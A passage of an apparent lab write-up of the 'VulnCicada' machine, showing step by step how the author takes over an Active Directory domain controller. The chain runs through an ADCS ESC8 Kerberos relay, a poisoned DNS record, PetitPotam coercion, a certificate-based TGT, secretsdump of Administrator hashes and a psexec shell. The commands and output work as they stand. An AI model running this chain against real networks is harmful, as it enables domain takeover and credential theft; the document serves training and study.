nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k
The authentication was successful, confirming that I had valid domain credentials for the user Rosie.Powell. This gave me my initial foothold in the Active Directory environment.
Share Enumeration
Now that I had valid credentials, I enumerated the available shares using the Rosie.Powell account and discovered that it had READ access to the CertEnroll share, which is an Active Directory Certificate Services (ADCS) share:

ADCS environments often contain vulnerabilities that can be exploited for privilege escalation.
Certificate Services Enumeration
With access to the Certificate Services share, I used Certipy to enumerate enabled and vulnerable certificates using the Rosie.Powell account:
certipy-ad find -u "Rosie.Powell@cicada.vl" -p "Cicada123" -k -dc-ip 10.129.234.48 -dc-host DC-JPQ225.cicada.vl -ns 10.129.234.48 -enabled -vulnerable -stdoutCertipy v5.0.2 - by Oliver Lyak (ly4k)
[!] KRB5CCNAME environment variable not set[!] Target name (-target) not specified and Kerberos authentication is used. This might fail[*] Finding certificate templates[*] Found 33 certificate templates[*] Finding certificate authorities[*] Found 1 certificate authority[*] Found 11 enabled certificate templates[*] Finding issuance policies[*] Found 13 issuance policies[*] Found 0 OIDs linked to templates[*] Retrieving CA configuration for 'cicada-DC-JPQ225-CA' via RRP[*] Successfully retrieved CA configuration for 'cicada-DC-JPQ225-CA'[*] Checking web enrollment for CA 'cicada-DC-JPQ225-CA' @ 'DC-JPQ225.cicada.vl'[!] Error checking web enrollment: timed out[!] Use -debug to print a stacktrace[*] Enumeration output:Certificate Authorities 0 CA Name : cicada-DC-JPQ225-CA DNS Name : DC-JPQ225.cicada.vl Certificate Subject : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl Certificate Serial Number : 1459CFA9F5752BB6494FFAE4866344A9 Certificate Validity Start : 2025-09-08 22:25:32+00:00 Certificate Validity End : 2525-09-08 22:35:32+00:00 Web Enrollment HTTP Enabled : True HTTPS Enabled : False User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Active Policy : CertificateAuthority_MicrosoftDefault.Policy Permissions Owner : CICADA.VL\Administrators Access Rights ManageCa : CICADA.VL\Administrators CICADA.VL\Domain Admins CICADA.VL\Enterprise Admins ManageCertificates : CICADA.VL\Administrators CICADA.VL\Domain Admins CICADA.VL\Enterprise Admins Enroll : CICADA.VL\Authenticated Users [!] Vulnerabilities ESC8 : Web Enrollment is enabled over HTTP.Certificate Templates : [!] Could not find any certificate templatesIdentifying ESC8 Vulnerability
I discovered that the Certificate Authority (CA) was vulnerable to ESC8, which is a vulnerability related to ADCS Web Enrollment. According to research from abrictosecurity, ADCS Web Enrollment deploys a web server that enables clients to request certificate templates. This web server supports NTLM authentication, making it susceptible to relay attacks.
Since NTLM was disabled on this domain controller, I needed to look for Kerberos relaying attack possibilities.
Researching Kerberos Relay Attacks I found an interesting article from synacktiv about relaying Kerberos over SMB. This technique would allow me to exploit the ESC8 vulnerability even with NTLM disabled.
Setting up DNS Poisoning
Following the Synacktiv article, I added a DNS record to prepare for the Kerberos relay attack:
└─$ python3 dnstool.py -k -u 'CICADA.VL\\ROSIE.POWELL' -r 'DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' -dns-ip 10.129.202.65 -d 10.10.15.0 --tcp DC-JPQ225.cicada.vl --action add[-] Connecting to host...[-] Binding to host[+] Bind OK[-] Adding new record[+] LDAP operation completed successfullyThis DNS record would redirect traffic to my controlled server, enabling the relay attack.
Setting up Certificate Relay
Next, I set up a Certipy relay server targeting the HTTP web enrollment service:
└─$ certipy-ad relay -target 'http://dc-jpq225.cicada.vl/' -template DomainControllerCertipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)[*] Listening on 0.0.0.0:445[*] Setting up SMB Server on port 445This command set up a relay server that would capture authentication attempts and request a DomainController certificate template.
Triggering Authentication Coercion
In a separate terminal, I used NetExec with the coerce_plus module to force the domain controller to authenticate to my malicious DNS record:
└─$ nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam
The coercion was successful The PetitPotam method forced the domain controller to authenticate to my controlled server.
Capturing the Domain Controller Certificate
Back on the Certipy relay terminal, I successfully received the DomainController certificate:

Now that I have the dc-jpq225.pfx certificate for the Domain Controller, it will allow me to impersonate the DC and dump credentials.
Requesting TGT with Certificate
With the Domain Controller certificate in hand, I used Certipy’s auth module to request a TGT (Ticket Granting Ticket) that I could use for further operations:
└─$ certipy-ad auth -pfx dc-jpq225.pfx -dc-ip 10.129.202.65
I now have a valid Kerberos ticket cache file (dc-jpq225.ccache) that would allow me to authenticate as the Domain Controller.
Dumping Administrator Credentials
With the TGT in place, I used Impacket’s secretsdump tool to extract the Administrator’s password hash from the domain controller:
KRB5CCNAME=dc-jpq225.ccache impacket-secretsdump -debug -k -no-pass \ 'cicada.vl/dc-jpq225$@DC-JPQ225.cicada.vl' \ -just-dc-user administrator
I successfully dumped the Administrator’s credentials, including both NTLM and AES encryption keys.
Obtaining Administrator TGT
Using the extracted AES key, I requested a fresh TGT for the Administrator account:
└─$ impacket-getTGT -aesKey f9181ec2240a0d172816f3b5a185b6e3e0ba773eae2c93a581d9415347153e1a CICADA.VL/Administrator
Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Administrator.ccacheI have a valid Administrator TGT saved as Administrator.ccache.
Finally, I used Impacket’s psexec tool to obtain a shell on the domain controller with Administrator privileges:

I achieved complete compromise of the VulnCicada domain controller and got the flags